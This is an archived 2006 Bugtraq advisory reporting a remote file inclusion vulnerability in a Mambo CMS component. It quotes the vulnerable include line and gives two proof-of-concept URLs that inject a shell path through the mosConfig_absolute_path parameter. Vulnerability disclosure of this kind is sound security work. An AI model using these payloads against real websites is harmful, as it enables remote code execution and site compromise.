Mambo Component - Display MOSBot Manager Remote File Inclusion Vuln

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: Mambo Component - Display MOSBot Manager Remote File Inclusion Vuln
From: Outlaw@xxxxxxxxxxxxxxxxx
Date: 20 Aug 2006 01:01:23 -0000
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm

                
###########################################################################################
                #                       Aria-Security.net Advisory              
                          #
                #                       Discovered  by: O.U.T.L.A.W             
                          #                     #                       < 
www.Aria-security.net >                                         #
                #               Gr33t to: A.U.R.A & Hessam-X & Cl0wn & DrtRp    
                          #
                #                                                               
                          #
                
###########################################################################################


#Software: Mambo Component - Display MOSBot Manager
#Attack method: Remote File Inclusion   
#Source:

#include_once( "".$mosConfig_absolute_path."/administrator/components/". 
$component_directory ."/toolbar.". 

************************************************************************************

                                                                                
          
#Proof of Concept:                                                              
          
#http://www.site.com/com_admin-copy_module/toolbar.admin-copy_module.php?mosConfig_absolute_path=shell
#http://www.site.com/com_admin-copy_module/admin.admin-copy_module.php?mosConfig_absolute_path=shell
    
#----------------------------------------------------------                     
          
#                                                                               
                                                                                
          
#                                                                               
                  
#Contact : Outlaw@xxxxxxxxxxxxxxxxx

Prev by Date: Mambo Component - Display MOSBot Manager Remote File Inclusion Vuln
Next by Date: DoS 2wire Gateway
Previous by thread: Re: Mambo Component - Display MOSBot Manager Remote File Inclusion Vuln
Next by thread: DoS 2wire Gateway
Index(es):
- Date
- Thread